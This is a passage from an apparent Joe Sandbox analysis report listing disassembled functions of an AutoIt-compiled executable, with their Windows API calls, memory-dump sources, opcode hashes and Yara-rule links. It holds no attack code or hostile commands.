                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5b31f16b3c46f1db88d43250f20718dddb62461df491eeeb80b131f07000f402
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0fdd59c6118b10fb5293663b15fe35df5f5c8f4f1919dedd1351c38224e132d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b31f16b3c46f1db88d43250f20718dddb62461df491eeeb80b131f07000f402
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51414D31B0838A9BD735CB3CC7CAF69BB93AB46350F14446DE9C746994C6369548F710
                                                                                                                                                                                                                                                                                                        Function 0104379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010437B7
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 010437BF
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010437CA
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 010437D6
                                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01043812
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01043823
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01046504,?,?,000000FF,00000000,?,000000FF,?), ref: 0104385E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0104387D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 615120dcbfae6f962688338c4bfa0e3ebe067d11cfbeb115d251ef50d49c8ff6
                                                                                                                                                                                                                                                                                                        • Instruction ID: c542b97d41899b9587d522e9470ebc7b7b8b8ff918db89497fe7ab0b55408475
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 615120dcbfae6f962688338c4bfa0e3ebe067d11cfbeb115d251ef50d49c8ff6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF31A0B6201224BFEB258F94CC89FEB3FADFF59751F044065FE489A181D6B99841C7A0
                                                                                                                                                                                                                                                                                                        Function 01035A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                        • Opcode ID: a84219fe3a12fd5097736989e9e1beb7ee40698724cf03acc3fc0f2ab14e26a7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 08c27ebdb90aa2d2871760d4912d819864ba61e9e6b4feda3895ccc2aaeedd75
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84219fe3a12fd5097736989e9e1beb7ee40698724cf03acc3fc0f2ab14e26a7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92D1B271A0020A9FDF14DFA8CC85AEEB7F9FF88304F148569E995AB291D770D942CB50
                                                                                                                                                                                                                                                                                                        Function 00FF18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00FF194E
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF19D1
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00FF1B7B,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1A64
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00FF1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00FF1AF7
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FF1B22
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FF1B2E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 06b166295c6705242c6bf4ed2deed2618cb5cf71dba09bdc4ff0ad0c6fc4b2d7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a902d2d3e8c4c0a6b2811216a429ff188703cd13f850dc8d1ad0a99f2f833d6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06b166295c6705242c6bf4ed2deed2618cb5cf71dba09bdc4ff0ad0c6fc4b2d7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE91E672E0025EDADB318EA5CC91AFE7BB5BF49320F140159EA05E7160E779CD40E7A0
                                                                                                                                                                                                                                                                                                        Function 01034F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1357f2600a7c2a012994b516c41e0c0d33d23c4c42a4dcd397c69713d6767f04
                                                                                                                                                                                                                                                                                                        • Instruction ID: 73a257c74ba207e2a02e76bd5f0bb9a078973771f9bbc2c438e9cdcc2feec49a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1357f2600a7c2a012994b516c41e0c0d33d23c4c42a4dcd397c69713d6767f04
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8918E71A00219ABDF20CFA5CC88FAEBBBCEF85714F008559F595AB251D7709941CFA0
                                                                                                                                                                                                                                                                                                        Function 01021B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01021C1B
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021C43
                                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 01021C67
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021C97
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021D1E
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021D83
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021DEF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 45ce3d9446c8d8b9356b953bd12f7e1f13b90119b7f97614db1f6f9166dfc4ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9e1c4de960de8c01e25fdabca47c9f2b5ee43f6512bbcdbc9b77473fa649bacd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45ce3d9446c8d8b9356b953bd12f7e1f13b90119b7f97614db1f6f9166dfc4ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3391F575A00229EFDB11EF98C884BFEBBB8FF44711F244055E690AB291D779E941CB90
                                                                                                                                                                                                                                                                                                        Function 010343A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 010343C8
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 010344D7
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010344E7
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0103467C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantInit.OLEAUT32(00000000), ref: 010216DE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantCopy.OLEAUT32(?,?), ref: 010216E7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102169E: VariantClear.OLEAUT32(?), ref: 010216F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                        • Opcode ID: 408c50b3b41ae16de2cfb0f7d4116ad0dd9f6e44fefeaa3c67f97ceb8f2daa3c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 99d3190f3b56a3a07adf397c9eef5348b4e77d33da606738633ff7ae9b70e1f2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 408c50b3b41ae16de2cfb0f7d4116ad0dd9f6e44fefeaa3c67f97ceb8f2daa3c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C914874A083029FC714DF68C48096ABBE9FF89714F04896DF8899B351DB35E906CF82
                                                                                                                                                                                                                                                                                                        Function 0103560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?,?,01010C4E), ref: 0101091B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010936
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010944
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010108FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?), ref: 01010954
                                                                                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 010356AE
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010357B6
                                                                                                                                                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0103582C
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 01035837
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3665da0855479d8e50258befa34d8d17f00f64aa005801ae2f79217f67c18172
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4d080bc4f259d1af0e1a06b4cbd3c0bb59243dd53241ca30ddb84300f8251a3c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3665da0855479d8e50258befa34d8d17f00f64aa005801ae2f79217f67c18172
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48912571D00219EFDF11DFA4DC80AEEBBB9BF48300F10416AE955AB251EB749A44CFA0
                                                                                                                                                                                                                                                                                                        Function 01042B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 01042C1F
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 01042C51
                                                                                                                                                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01042C79
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01042CAF
                                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 01042CE9
                                                                                                                                                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 01042CF7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 01042D7F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b0b4c53b6e4bfeae5568d519568a5270e245432e9e1723ba6419aa2766408a7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 58d6609dc784371b7d0afd82f56a61f7b76c145af198cff98ed91f257f2bdfa6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b0b4c53b6e4bfeae5568d519568a5270e245432e9e1723ba6419aa2766408a7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D7171B5E00215AFCB11EFA4D880AEDB7F5EF48310F1484A9E896EB351DB35A941CF90
                                                                                                                                                                                                                                                                                                        Function 010488F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 01048992
                                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0104899E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 01048A79
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 01048AAC
                                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 01048AE4
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 01048B06
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 01048B1E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9dc90a7a465ae4c6afddd4117aa77f4165e44466f070417f4a66e3b21bc8664e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33af73f142096de27a44fdc85f6353f74c2566c5e548a2e093f6ffef0dfd72e0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dc90a7a465ae4c6afddd4117aa77f4165e44466f070417f4a66e3b21bc8664e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F071C2B8604205AFEB65DFD8C8C4FAABBF5FF49300F0488AAE9C567251C775A850CB51
                                                                                                                                                                                                                                                                                                        Function 0101B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 0101B8C0
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101B8D5
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101B936
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0101B964
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0101B983
